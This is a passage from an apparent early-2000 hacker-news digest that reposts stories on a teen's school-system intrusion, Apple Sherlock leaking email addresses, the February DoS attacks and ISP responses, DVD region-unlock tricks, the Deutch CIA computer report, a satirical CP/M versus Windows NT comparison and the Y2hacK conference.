interview him, and he dashes home to Kingstown to change into a plain white turtleneck. As if to reinforce the legitimacy of his art. � Copyright 2000 The Washington Post Company @HWA 71.0 HNN:Feb 21st:Student Charged with Breaking Into High School Systems ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Dan Jacy Kyle Johnson, 14, has been charged with accessing a computer network without authorization of the network owner after he allegedly broke into teacher grading files from a computer in the school library. Crystal River High School officials say they don't think he changed his or anyone else's grade, but he may have penetrated at least two firewalls too reach the compromised system. St.Petersburg Times http://www.stpetersburgtimes.com/News/021800/Citrus/Boy__14__charged_with.shtml Boy, 14, charged with hacking Authorities say he got into a server at Crystal River High School that contained teacher files, including students' grades. But they say he didn't change anything or damage the school's system. By BILL VARIAN � St. Petersburg Times, published February 18, 2000 CRYSTAL RIVER -- Jacy Kyle Johnson sometimes bragged to his friends that he could crack the school computer system and change his grades. He is accused of doing a little more than boast. Johnson, 14, is charged with hacking his way into teacher grading files almost two weeks ago from a computer in the Crystal River High School library. School officials say they don't think he changed his or anyone else's grade, but he may have penetrated at least two protective software layers in the computer called firewalls, which are designed to prevent such intrusions. "The first thing we did is call in our district technical support people," Crystal River principal Craig Marlett said Thursday. "They're pretty confident he didn't change his grades. He was on his way, but didn't get quite into it." Johnson was in juvenile court Thursday, where he faced a charge of accessing a computer network without authorization of the network owner -- computer hacking -- stemming from his Feb. 7 arrest. He also faced three other charges related to alleged assaults on his mother and was ordered held at a juvenile detention center in Ocala for up to 15 days while officials determine what to do with him. Keith Schenck, staff attorney for the Circuit Court judges in Citrus County, said it is rare that someone has been charged with such an offense in this county. "This may be the first one," he said. However, the law under which Johnson is charged actually was created in 1978, he said. The teen was found out after another student witnessed Johnson using a library computer to tap into school records and told a teacher. The teacher saw Johnson walk away in a hurry from the computer and checked it out, said Jeffery Smith, the assistant state attorney who handles juvenile offenders. A school resource officer investigated the incident. He learned from school staff that Johnson had bragged about breaking into the school computer. Staff members also told him students were talking about paying Johnson to change their grades. From the library computer, Johnson gained access to the computer server for authorized personnel. From there, he was able to look at teachers' files that include past and current grades, according to the school resource officer's report. The officer, Deputy Ron Frink, said a school district technology specialist told him Johnson was in an area that took two security password clearances to penetrate. Smith said the boy confessed. He also said it doesn't appear that Johnson actually changed any grades. "I have no indication that there was anything other than him bragging happening," Smith said. The computer hacking charge is a third-degree felony, and Johnson would have faced as many as five years in prison if convicted as an adult. Had he actually changed his grades, the charge would have been upgraded to a second-degree felony, which carries a prison term of up to 15 years. Because he is charged as a juvenile, he faces a more limited penalty, which could include counseling. @HWA 72.0 HNN:Feb 21st:Japan To Increase Cyber Defense ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by William Knowles Ken Sato, administrative vice minister of The Defense Agency, said that they are planning to establish a unit in the Self-Defense Forces dedicated to combating cyber intrusions against key computer systems, as part of the five-year defense buildup program beginning in fiscal 2001. The Daily Yomiuri http://www.yomiuri.co.jp/newse/0218cr06.htm (404) @HWA 73.0 HNN:Feb 21st:Possible Privacy Violation in Apple's Sherlock ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Arik Apple's Sherlock, an Internet search technology, sends out users' e-mail addresses. This occurs when Sherlock, going into auto-update mode, searches for new versions of modules that enables it to search specific sites. When the update is sent via FTP Sherlock logs in, sending the users' e-mail address as the login password. (This is a known issue with FTP, that is why they invented SCP.) The Register UK http://www.theregister.co.uk/000218-000017.html Posted 18/02/2000 1:40pm by Tony Smith MacOS' Sherlock surreptitiously sends email addresses A security glitch that exposes users' email addresses has been found lurking within Apple's Sherlock Internet search technology. The discovery comes a month after it was detected that Apple's iTools online service transmits users' passwords without scrambling them first. The latest discovery was made by MacWelt magazine and Web site MacSherlock. In fact, it's not a glitch as such, rather it's a lack of thought on the part of Sherlock's programmers. Sherlock has an auto-update facility which checks for new versions of modules that allow it to search specific sites. The Register itself has just such a plug-in that can be downloaded here. Our plug-in is provided through a Web server, but if the update is transferred by FTP, Sherlock will log in anonymously, but provide the user's email address as the login password. In the past, it was considered courteous to provide your email address this way when downloading files anonymously. Nowadays, in these more privacy-conscious times, it's much less commonplace. In fact, many applications that support FTP, such as Netscape Navigator, allow users the choice as to whether their email address is transmitted this way. Last month's security glitch centred on the iTools browser plug-in, which communicates with the server using XML. Software developer Brad Pettit discovered that the plug-in transmits the user's password as plain text. "One could theoretically control the plug-in from any link that loads content into your Web browser. And you wouldn't even know it," he said. Pettit also found the iTools software capable of "gathering and sending all sorts of machine-specific data to Apple, such as hardware ethernet addresses. � @HWA 74.0 HNN:Feb 22nd:Sympatico Quiet on Search for mafiaboy ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ contributed by twilyght Bell Canada's Sympatico Internet service, Canada's largest Internet service provider, refused to comment on weekend reports that police had searched the company's files for information about a user known as 'mafiaboy', who has been linked to data attacks this month on e-commerce sites. After an accusation by Recourse Technologies Inc., that mafiaboy was based in Canada RCMP officials have searched the offices of other service providers in the area. The Toronto Star http://www.thestar.com/thestar/editorial/money/20000222BUS07b_FI-HACK.html (404) @HWA 75.0 HNN:Feb 22nd: ISPs Look at Customer Security as Low Priority ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by William Knowles After the recent media hyped denial of service attacks against such major online sites as Yahoo, CNN, ZD Net and others, home users are becoming more and more concerned about their own security and are looking to their ISPs for help. ISPs say that they are doing the best that they can to respond to customer requests. ZD Net http://www.zdnet.com/zdnn/stories/news/0,4586,2444159,00.html?chkpt=zdhpnews01 Web attacks: Are ISPs doing enough? Not according to many broadband customers and security experts. By Robert Lemos, ZDNet News UPDATED February 21, 2000 2:28 PM PT Security experts and Internet users are becoming increasingly vocal about their concerns that high-speed Internet providers are not doing enough to ensure the data security of home users. "It's been two months (since I notified my provider of three potential attacks)," wrote a Santa Clara, Calif.-based Web production manager to ZDNet News Talkback. "And I still haven't heard from (them). I'm not overly concerned about prosecuting hackers ... but I do care about my own privacy and the security of my system." In the wake of the recent denial-of-service attacks against eight major Web sites, including ZDNet (NYSE: ZDZ), personal security has become less of an add-on and more of a must-have feature for Internet surfers. (See: Has your PC been hijacked?) Customer security low priority Unfortunately, while high-speed Internet providers are intent on making their networks secure, they frequently overlook the security of their customers, said Jeremy Rauch, manager of vulnerability content and co-founder of security information site Security-Focus.com. "Broadband ISPs don't seem to be doing a lot on the problem right now," he said. "They don't seem to be going out of their way to educate customers about the problem." A recent example: Two months ago, said Rauch, Usenet newsgroups were ready to give the @Home Internet service the "death penalty" -- blocking any user from the @Home domain from posting to newsgroups. The reason? Spammers were sending e-mail out to the Internet using @Home customers' computers to camouflage the source. If the ISP had helped its users correctly configure their computers, the problem never would have happened, said Rauch. Yet, providers insist that they are taking customers' security seriously. 'Eyes and ears open' @Home has learned from its checkered past, said Jacqueline Russo, spokeswoman for Excite@Home (Nasdaq: ATHM), and now has become more vigilant, adding a security page to its services sponsored by security software maker McAfee. "We are constantly keeping our eyes and ears open," she said. Another problem for providers: Personal firewall programs have become quite popular with users. Many of those programs warn users of every little ping and port request, resulting in paranoid users who always think their PCs are under attack. "These programs have taken off in the past six to eight weeks as more people are going out and looking for security," said Curtis Benton, network operations manager for Internet-over-DSL provider Flashcom Communications Inc. "Yet, people get too concerned over security sometimes, and they become convinced that anything attempting to contact their computer is coming from a malicious personality." The result is a flood of e-mail to providers that is as debilitating as the denial-of-service attacks that hit the Web Feb. 7-9. 'A stack of complaints' "We have an abuse coordinator that has a stack of complaints that he has to determine whether are a serious threat or not," explained a system administrator for Road Runner, Time Warner Inc.'s high-speed Internet service, who asked to remain anonymous. "It would be hard to respond to every single complaint, especially when people are sending us their BlackICE logs and the like every day, and we have thousands of users." In the week following the attacks on major Web sites, personal firewall maker Network ICE Inc. has seen requests for its product, called BlackICE, skyrocket by 30 percent to 50 percent. Rival Zone Labs, maker of a free firewall called ZoneAlarm, has seen 400,000 downloads of its program in the past week. Greg Gilliom, CEO of Network ICE, admits that personal firewalls can generate a lot of alarms. "The problem (for providers) is that they don't have time to deal with every knock on a customer's door by script kiddies," he said. The next version of BlackICE will not explicitly tell users when it has blocked an attempt to access their PC, though it will log the incident. Gilliom also stressed that broadband providers are getting better about integrating their customers' security with their own. "We are in discussion with several ISPs that are thinking about rolling out a security service," he said. "They can charge the end user $3 to $5. Later, as everyone starts doing security, it will just become part of the service." Security: Let the user decide? That will let Internet providers tailor security to the needs of the user, said Shawn Dainas, spokesman for Pacific Bell Internet Services. "Consumer have to decide if they need more security themselves," he said. "Just like in the real world, different people have different security needs -- some may want to have a state-of-the-art security system, others may just need a dog." In the meantime, users should not wait for the broadband providers to come to them, stressed David Davidson, a software engineer from Omaha, Neb., in a post to ZDNet News Talkback. "(Don't) take your security for granted," he wrote. "Learn and protect yourself." @HWA 76.0 HNN:Feb 22nd:Circumventing DVD Zoning ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by no0ne The movie industry has divided the world into different DVD zones. A DVD made for a certain zone is not going to play or be recognized by DVD players in other zones, at least that was how it was supposed to be. People have found different ways of circumventing the zoning, detailing ways of how to make DVD players from certain regions read DVD's meant for other regions. The Register UK http://www.theregister.co.uk/000222-000008.html Posted 22/02/2000 2:15pm by Tony Smith How to hack Tesco's DVD player -- Register readers write Register readers are clearly a resourceful lot -- we've had stacks of email revealing just how Wharfedale's DVD player can be hacked to support DVDs from any of the regions into which the movie industry has divided the world (see Tesco slams 'unnecessary' DVD zoning). Well, Wharfedale admitted its player was "easily hackable", and it sure is. The trick is simple: open the player's tray, put a Region One disc on the tray, press the 0, 1, 2 and 3 buttons on the remote control, and finally press Play on the remote. That closes the tray and from this point on the player will accept DVDs from any of the six main regions. Thanks to reader Patrick for pointing out that the hack also works with the Proline DVD1000, the Bush DVD-2000, the Grundig GDV-200 and the Grundig GDV-210 DVD players. And Tony D notes that you can also "press pause on an Aiwa stereo remote whilst pointing at unit. You will see a mainenance screen. Set the region, and off you go. This works on my Wharfedale". Readers Chris Dennis and Tom note that to convert the player back to Region Two only, the procedure is: open the tray, place a Region Two disc on the tray, press the Return button on the remote and finally press the remote's Play button. Of course, there's probably little point in returning the player to its original state since, as reader Rob notes, "my DVD quite happily plays Region One and Region Two without difficulty". Owners of Matsui DVD-110 player and the Schneider DVD-810 sold by Asda, there's a hack for them too, according to a number of readers. Simply press Menu, 9, Open/Close (note that the tray won't open at this point) and then 5 to call up a region selection screen. And thanks to Andy Crawford for pointing out Web site DVD Reviewer, which lists pretty much all the machines currently available with simple multi-region hacks and reveals just how effective the hacks are -- not always, it seems, particularly with older players. Kate Wolf dropped us a line to say that hi-fi specialist Richer Sounds offers an Ariston player that can also be easily hacked. And, according to Keith Kennedy and others, "90 per cent of all the DVD players sold in [Switzerland] are sold as region free". That said, this appears to be simply because stores send all their kit out for conversion before selling them on to the public. As Nick Barnes found: "Chatting to a staff member in Media Markt... he confirmed that stores buy X units from manufacturer Y and send them all to company Z that modifies them". Rob White had problems with the Wharfedale DVD-750 he bought from Tesco and took it back (he didn't say whether he tried a replacement machine). Instead, he uses his PC and PowerDVD software which "easily defeats the zoning information, by the way, just by storing the zone in the registry". DVD software region changing is tackled by DVD Informatrix (thanks to Phil Chambers for the link). Matt Rix, meanwhile, provides a little anti-spin (in the great Register tradition). "Tesco had been selling the Wharfedale player for several months before Christmas, but due to very high demand it went out of stock," he notes. "So really, they're re-launching the old product line." So much for Tesco's 'sales trial' line. � @HWA 77.0 HNN:Feb 22nd:Voters Kill Filter Proposal ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by janoVd While a majority of voters in Michigan cast ballots in favor of presidential hopeful John McCain, voters in the small town of Holland were also voting on whether to allow the public library to install filters on its computers. Residents of the small town voted 4,379 to 3,626 against the proposal, which would have cut off funding to the library unless the filters were installed. Proponents of the measure have said that the defeat won't end their fight to get filters installed on the library computers. (The people have spoken, listen to them!) Associated Press - via Boston Globe http://www.boston.com/dailynews/054/economy/Voters_defeat_measure_on_filte:.shtml (404) @HWA 78.0 HNN:Feb 22nd: Former CIA Director Regrets Security Breech ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Evil Wench Former CIA Director John Deutch appeared before the Senate Intelligence Committee to answer questions regarding his use of computers at his home for classified material. There is no evidence that indicates his system was comprised during the time it was used May 1995 to December 1996. (Companies should learn from this when employees take their laptops home.) Reuters - via Yahoo http://dailynews.yahoo.com/h/nm/20000222/ts/cia_deutch_5.html Tuesday February 22 7:49 PM ET Former CIA Chief Contrite Over Risky Computer Use WASHINGTON (Reuters) - Former CIA Director John Deutch, who was found to have ``intentionally'' used nonsecure home computers to process secret reports, showed contrition when he went before a closed Senate hearing on Tuesday. Deutch was questioned by the Senate Intelligence Committee, which released a CIA report of its probe into Deutch's use of computers at his home for classified material while he served as CIA director from May 1995 to December 1996. The 77-page report, an unclassified version of an 86-page classified CIA report given to congressional intelligence committees last August, said Deutch ``continuously processed classified information on government-owned desktop computers configured for unclassified use during his tenure.'' Examples of material found on Deutch's computers included memos to the U.S. president and vice president containing top-secret information, including information on official trips, the report of the CIA Inspector General said. ``I acknowledged, and I apologized for, the mistakes I made in using unclassified government computers for some of my classified work,'' Deutch said after the hearing. ``At no time did I intend to violate security rules, and, fortunately, there is no evidence of compromise,'' he said. ''The director of central intelligence is not above the rules, and, indeed, the director of central intelligence should be an example of respect for security. I very much regret my errors,'' he said. Deutch's Successor Criticized The report was critical of the investigation of Deutch and said his successor, George Tenet, should have ``involved himself more forcefully to ensure a proper resolution of this matter.'' The CIA's director of public affairs, Bill Harlow, issued a statement noting that Tenet had accepted the initial investigation was not conducted well but stressing that the Inspector General had concluded that no one had ``intentionally impeded'' it. ``We could have and should have done better,'' Harlow said. Deutch was stripped of his CIA and high-level Pentagon intelligence clearances last August for mishandling classified information. Recently he gave up his last remaining Pentagon clearances, which allowed him to work on classified defense contracts. The report referred to a prior incident of the mishandling of classified information that involved Deutch before he became CIA director. In the early 1980s, while Deutch was on an advisory panel, he took a lie-detector test that apparently showed he had not been as careful in handling classified material as he should have been, but the issue was resolved. ``It's Unusual Behavior'' Richard Shelby, the Alabama Republican, who chairs the Senate Intelligence Committee, said of Deutch's actions: ``It's unusual behavior, especially where Dr. Deutch had been warned before regarding his misuse of classified information. We know he's a bright man, he's served the government a long time, but he wasn't serving it very well when this went on.'' The report said there was no evidence that any top-secret material had been compromised despite the facts that a number of people had access to the computers and the computers had Internet connections. But it concluded that Deutch had been told he was not authorized to process classified information on nonsecure computers, which he had at his Maryland and Massachusetts homes and his offices in the Old Executive Office Building and CIA headquarters. He also used a CIA-issued unclassified laptop computer for classified information, the report said. ``Throughout his tenure as (CIA head), Deutch intentionally processed on those computers large volumes of highly classified information (including) Top Secret Codeword material,'' it said. ``All were connected to or contained modems that allowed external connectivity to computer networks such as the Internet. Such computers are vulnerable to attacks by unauthorized persons,'' the report said. Classified Information Retrieved ``CIA personnel retrieved (classified) information from Deutch's unclassified computers and magnetic media related to covert action, Top Secret communications intelligence and the National Reconnaissance Program budget,'' the report said. Deutch had said other people who used the government computer in the study of his Maryland home included his wife, who used it to prepare reports relating to official travel with him, the Inspector General's report said. Another family member used that computer to access a university library. A maid who worked at the Deutches' Maryland home and was a resident alien in the United States was allowed ''independent access to the residence'' while the family was away and had the alarm-deactivation code for the home. ``CIA security database records do not reflect any security clearances being issued to the alien,'' who obtained U.S. citizenship in 1998, the report said. Deutch used an online identity that was a variation of his name, and he was listed by his real name in the Internet service provider's publicly available online membership directory, the report said. ``Deutch's online identities used during his tenure (as director of central intelligence) may have increased the risk of electronic attack,'' it said. The CIA and Pentagon are conducting separate reviews of the material found on Deutch's home computer to assess what might have been compromised if an outsider had accessed it. Shelby faulted the CIA for not conducting such an assessment sooner and Tenet for having been too slow to inform the panel. ``All this happened on (Tenet's) watch,'' Shelby said of the Deutch investigation. ``This I do not believe was Mr. Tenet's finest hour.'' @HWA 79.0 HNN:Feb 22nd:New Version of DeCSS Available ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Odin We reported on this last week but the mainstream is finally catching up. A small utility called "DeCSS" that strips Cascading Style Sheet tags from an HTML document has been released. It is hoped that people will download, post and link to this version in an effort to confuse and confound the MPAA lawyers. Salon http://www.salon.com/tech/log/2000/02/22/decss/index.html DeCSS http://pigdog.org/decss @HWA 80.0 HNN:Feb 22nd: Windows-NT vs. CP/M ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Dan This may be old but it is too funny not to post. Microsoft has come out with a number of benchmarks and comparison papers championing the fact that Windows-NT is much better than every other operating system. But is it better than CP/M? Yes, CP/M. One of the first personal computer operating systems. (And the one I first used on an Osborne One) Windows-NT vs. CP/M http://www.oualline.com/col/cpm.html Windows-NT vs. CP/M Microsoft has come out with a number of benchmarks and comparison papers championing the fact that Windows-NT is much better than Linux. I find such comparisons fascinating, but rather than rehash this argument, I've decided to create my own comparison. Not of Windows-NT vs. Linux, that's been done. But of Windows-NT vs. CP/M. CP/M for those of you who don't remember was one of the first portable operating systems. It ran on 8 bit 8080 class hardware, and was a single user, floppy based system. (Later versions actually could access a hard drive.) Two systems were selected for this comparison. The CP/M system is a Kaypro-II running a 2MHZ Z80, with 64K of memory and dual 360K 5-1/4 floppies. The Windows-NT system runs quad 500 MHZ Pentium Processors, with 2GB of memory and 1TB of disk space. This particular configuration was chosen because Microsoft seems to like to use a system like this for all its benchmark comparisons. Performance Performance is one key issue in any comparison. I do a lot of writing, so word processing performance is extremely important to me. The CP/M system with Word* and after a 15 second boot Word* let me write documents as fast as I could type. In my two minute test, I could enter about 210 words. The Windows-NT system running Microsoft Word also could accept input as fast as I could type, but it took a whole minute to boot up. Thus I could enter only 120 words in my test. So we can conclude that CM/P is 75% faster than Windows-NT for word processing. Let's talk about spreadsheet performance. CP/M with Calc* will balance my checkbook just as fast as I can input the data. Counting the boot time, that means that I can enter about 17 transaction in a two minute test. With Windows-NT with Excel, I get only 10 transactions a second. So as far as spreadsheet performance goes, CP/M is 70% faster than Windows-NT. Conclusion: CP/M provides superior overall performance for common office applications. Security CP/M is an extremely secure system. It relies on the physical security methodology. You store the operating systems, programs, and private date on 5-1/4" floppies. You want to use them, put them in the machine. No one can get to your data from the outside through a network because CP/M has no network. You want to secure your data, take the floppies out and lock them up. Want to share data, hand the floppies to another person. Note: This security method allows the user a wide variety of personal authentication schemes such as drivers license, passport, or personal friend know to you. What's even better since we are running on a two floppy system, we can put our software on one floppy and the data on the other. The software floppy can be write protected, and nothing we do can change any of those files. Windows-NT relies on file system security and passwords. There have been lots of studies about the weaknesses of passwords. Any system that relies passwords in insecure. In addition Windows-NT contains a tremendous security hole called the Administrator account. Anyone logged in to this account can easily read and write all your files. Add to that that Windows-NT connects to a network and allows remote access and you have big security problems. There have been hundreds of reported security problems reported for Windows-NT such as viruses, E-Mail viruses, break ins, denial of service attacks, and many others. None of these problems have affected CP/M. Plus Microsoft relies on operating system file protection to keep you from modifying system files. This means that you must know what files to protect and rely on software to provide your protection. Hardware protection is much easier to configure and provides much more reliable protection. Windows-NT makes no use of hardware protection for system files. Microsoft likes to trumpet the fact that Windows-NT is certified by the government for C3 security. What they leave out is that that was only for a certain version of Windows-NT (which they no longer support) and a certain hardware configuration (which had no network card.) In the real world, a typical Windows-NT installation would never come close to getting C3 certification. CP/M however could easily be certified. It has a very secure network because it has no network capability. It also has set of keys that you can press that return you to the "secure command server". (It's called the reset button.) These are the big features of C3 security and CP/M has them. The reason that it does not have C3 certification is that no one wants to pay the big bucks to get it certified. Conclusion: The security of CP/M is vastly superior to Windows-NT. Stability As far as I know the CP/M system for my Kaypro has not needed an upgrade or patch for the past ten years. Also the operating system has no reported bugs that can crash it. It is small, simple and very stable. During that time Microsoft has two major release of Window-NT, at least 5 service packs and is planning on replacing the system with a new version next year. In addition to this there are a large number of bugs out there that Microsoft has yet to fix. Many companies reboot their Windows-NT systems weekly to avoid system crashes that come when you leave Windows-NT running for too long. Conclusion: CP/M is much more stable than Windows-NT. Cost of ownership You can probably pick up a Kaypro-II with CP/M, Word* and Calc* at a garage sale for about $10. Or you can go to an auction site and pick one up for about $100-$200. On the other hand a Window-NT system in the configuration that Microsoft likes to use for benchmarking will probably cost you about $100,000. This includes the price of the hardware, software, and the cost of hiring a team of Microsoft Engineers for three months to tune your system for optimal performance. Conclusion: The cost of ownership of CP/M is much, much lower than Windows-NT. Customer Testimonials But let's talk about real world experience. CP/M has hundreds of customer testimonials all describing how useful and easy to use this operating system is, while Microsoft Windows-NT is only able to provide anecdotal evidence. Note: We are use the definition of these terms as defined by Microsoft Marketing. Customer Testimonials Stories about how well the operating system works for the operating system you like. Anecdotal Evidence Stories about how well the operating system works for the operating system you don't like. Conclusion: Since CP/M has Customer Testimonials and Windows-NT has only Anecdotal Evidence, we must conclude that CP/M is vastly better. Conclusion These results show that in every comparison category that CP/M is at least as good as Windows-NT and frequently outperform the Microsoft operating system. Another conclusion we can draw from this is that if you come up with the answer, a good writer can come up with a question that produces the desired result. Comparisons like this one should always be scrutinized for relevance and bias before you put any faith into them. Coming soon, we will compare a Windows-NT system vs. a brick. I'm not going to give away the ending, but I'm going to bet that the brick will win. @HWA 81.0 HNN:Feb 24th:DigiAlmty Busted By Feds ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by McIntyre DigiAlmty (Ikenna Iffih), a 28-year-old Northeastern University student, has been charged with electronically breaking into the computer systems of NASA and the Pentagon. In April of 1999 DigiAlmty was charged with illegally gaining access to the systems of the Defense Logistics Agency and several commercial systems. Since then the case has been expanded and now includes intrusions of Northeastern, NASA and the pentagon. DigiAlmty has also been accused of illegally copying some files and destroying others. If found guilty, DigiAlmty could face up to ten years in prison and $250,000 in fines. U.S. Attorney Donald Stern said "All in all, the defendant used his home computer to leave a trail of cybercrime from coast to coast." (If this guy "left a trail from coast to coast" what took them so bloody long to drop the hammer?) DigiAlmty (Ikenna Iffih) was a member of the Northeastern Chapter of the Association for Computing Machinery. Mirror of ACM Member Page http://www.attrition.org/~mcintyre/digi/www.ccs.neu.edu/groups/acm/members.html Mirror of DigiAlmty's Home Page at Northeastern http://www.attrition.org/~mcintyre/digi/www.ccs.neu.edu/home/ikiffih/ Mirrors of DigiAlmty Defacements http://www.attrition.org/mirror/attrition/digia.html Agence France-Press - via Nando Times http://www2.nando.net:80/noframes/story/0,2107,500172150-500222086-50105851-0,00.html Associated Press - via Boston Globe http://www.boston.com/dailynews/054/region/Hacker_faces_charges_in_NASA_a:.shtml Reuters - via Wired http://www.wired.com/news/technology/0,1282,34539,00.html Student Charged in Govt. Hack Reuters 4:10 p.m. 23.Feb.2000 PST BOSTON -- A Northeastern University student was charged Wednesday with hacking into federal government computers, including systems at NASA and the Defense Department, in a coast-to-coast attack on public and private Web sites and servers, authorities said. If convicted Ikenna Iffih, 28, faces up to 10 years in prison and a $250,000 fine. U.S. Attorney Donald Stern said Iffih seized control of a NASA Web server in Maryland last year and was able to read, delete, and alter files, as well as intercept and save login names. The compromised server did not contain any classified or sensitive information, and was not involved with the command or control of satellites, Stern said. Using the NASA computer as a platform, Iffih allegedly attacked the Interior Department's Web server, defacing the agency's Web page, prosecutors said. Prosecutors also said Iffih accessed a Defense Department computer, as well as the Web site of an ISP in Washington state, where he "recklessly caused damage" and caused a significant loss of business, prosecutors said. "All in all, the defendant used his home computer to leave a trail of cybercrime from coast to coast," Stern said. A spokeswoman in Stern's office said that there was no known motive for Iffih's alleged hacking. "A lot of these hackers seem to do it just to strut their cyber-prowess," spokeswoman Samantha Martin said. Prosecutors said Iffih was not connected with the high-profile wave of hacking attacks on popular retail, news, and all-purpose Web sites earlier this month. @HWA @HWA 82.0 HNN:Feb 24th:ISPs Form Alliance To Prevent Attacks ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by no0ne A group of ISP's have joined forces with ICSA.net, an internet security firm, in an effort to prevent denial of service attacks like those that downed major web sites. They have created the Alliance for Internet Security to make sure that each other's systems and facilities are not used as agents to launch attacks against the other providers. Each member company must pledge to secure its own internal systems, add filtering technology to prevent spoofing, and provide support for others to do the same. Founding members include Cable One, Cable & Wireless, Digex, Global Crossing and its U.S. subsidiary Global Center, GTE Internetworking, Level(3), Road Runner, and Sprint. ZDNet http://www.zdnet.com/zdnn/stories/news/0,4586,2445261,00.html Web attacks? The ISPs strike back! Internet service providers band together to form a security alliance in hopes of avoiding another DoS debacle. By Robert Lemos, ZDNet News UPDATED February 24, 2000 9:53 AM PT The battle for an attack-proof Web rages on. Eight Internet providers have teamed with Internet security firm ICSA.net in an alliance to prevent denial-of-service attacks like the ones that downed several major Web sites earlier this month. The nine founding members of the Alliance for Internet Security promise to adopt security measures that will not only make it difficult to attack their computers but, more importantly, prevent their systems from being used in an attack against others. "The members of the Alliance are coming forward to be part of the solution and demonstrate their commitment to the right thing on behalf of all of the Internet," said Peter Tippett, AIS chairman, in a statement. "The first step for each of us is to clean up our own backyards, ensuring that our systems cannot be used as attack agents." Starting Feb. 7 with Yahoo! (Nasdaq: YHOO), a series of attacks slowed or, in many cases, downed major Web sites when a deluge of meaningless data and spurious access requests were targeted at their servers by unknown attackers. By week's end, eBay (Nasdaq: EBAY), E*Trade (Nasdaq: EGRP), Buy.com (Nasdaq: BUYX), ZDNet (NYSE: ZDZ), CNN, Amazon.com (Nasdaq: AMZN), The Microsoft (Nasdaq: MSFT) Network and Excite joined Yahoo! as victims of what are known as distributed denial-of-service attacks. Lessons to be learned The lesson for Internet service providers? Individuals and businesses on the Internet must not only protect their own computers from attack but also make sure the systems aren't being used to attack others. Each member company must pledge to secure its own internal systems, add filtering technology to prevent "spoofing" or forging the source address of a piece of data, and provide support for others to do the same. Founding members include Cable One, Cable & Wireless, Digex, Global Crossing and its U.S. subsidiary Global Center, GTE Internetworking, Level(3), Road Runner, and Sprint. "All Internet users should assure that their own network is in order and that their ISP is doing the appropriate filtering on behalf of everyone," said Harris Schwartz, director of security for Time Warner's (NYSE: TWX) high-speed Internet provider, Road Runner. Broadband providers offering individuals and small businesses fast connections are quickly becoming a stomping ground for Web vandals looking for easy targets. Most customers security-challenged Most users of such services know little of how to secure their systems -- and as many as 10 percent of such systems are completely open to anyone on the network. Educating such users about their role in making the Internet secure should be a top priority, said Stephen E. Cross, director of Carnegie Mellon University's Software Engineering Institute, speaking Wednesday before the Congressional Joint Economic Committee. "Support programs that provide early training in security practices and appropriate use ... should be integrated into general education about computing," Cross said. Yet, for the most part, the AIS will continue to overlook users and instead focus on businesses. Users on their own "This is about companies that are Internet-connected companies," said Laurie Wagner, senior vice president of business development for ICSA.net. Wagner pointed out that the alliance first needs to concentrate on the 5,000 or so small Internet providers that may not know much about security. For now, users are on their own, she said. "ISPs are not being paid to be security consultants for their users." @HWA 83.0 HNN:Feb 24th:Proposed Y2hacK Ban Not Getting Support ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by no0ne The proposed ban on the upcoming hacker con Y2hacK to be held in Israel is not gaining support. Speaking in a meeting of the Committee for Scientific and Technological Research and Development's Michael Eitan said that "canceling the conference would be a mistake, and a missed opportunity to learn from the hackers". The sentiment that "hackers are not always crackers" was also echoed in the meeting.(Glad that they understand that in Israel) Wired http://www.wired.com/news/politics/0,1283,34504,00.html Victory for Israel Hack Meet? by Tania Hershman 1:55 p.m. 23.Feb.2000 PST TEL AVIV � A proposed ban on the upcoming worldwide hacker conference to be held here is not gaining support and Y2hacK is likely to go on as planned. Michael Eitan said Tuesday during a meeting of the Knesset's Committee for Scientific and Technological Research and Development that canceling the conference would be a mistake -- and a missed opportunity to learn from the hackers. Last week, committee head Anat Maor wrote a letter to the attorney general calling for the worldwide hacker conference to be outlawed. "It's absurd. [Hacking] is illegal in Israel and many other countries, including the US," Maor said. "If there was going to be a conference of thieves, or a conference of men who beat their wives, how would you feel? You can't allow a conference that goes against the law." The attorney general has yet to respond. "It's a pity she didn't consult with me about the letter she sent to the attorney general," said the Knesset's Eitan, addressing a crowd that included representatives from Israel's largest ISP, Netvision, the Israel Chapter of the Internet Society, and security software company Aladdin, as well as politicians and lawyers from the Israeli Bar Association. Opinions offered at the meeting were overwhelmingly in favor of allowing the conference for the sake of freedom of expression. Several participants also emphasized that hackers are not always crackers. To illuminate the difference, colorful comparisons were drawn between the criminal who sees an unlocked car and steals it and the concerned citizen who leaves a note in the car informing the driver that it's unlocked. Maor acknowledged at the meeting that her initial outrage regarding Y2hacK may have been a little hasty. Although she was not being invited to the committee meeting, Shem Shaul, a UNIX specialist and journalist who got her first job in journalism by hacking into Israel's Globes news site, was pleased with the tone of the meeting. "I talked to Michael Eitan last night and explained some technical and ethical issues," Shaul said. "He knows me from the university and from journalism and he was very open. [Anat Maor] seemed to understand what a mistake she had made, and reached a better conclusion." Shaul and the Y2hacK team had sent Maor an official response to her letter to the attorney general. "A lot of these so-called hackers grow up to be the visionaries and founders of the Israeli ever-expanding 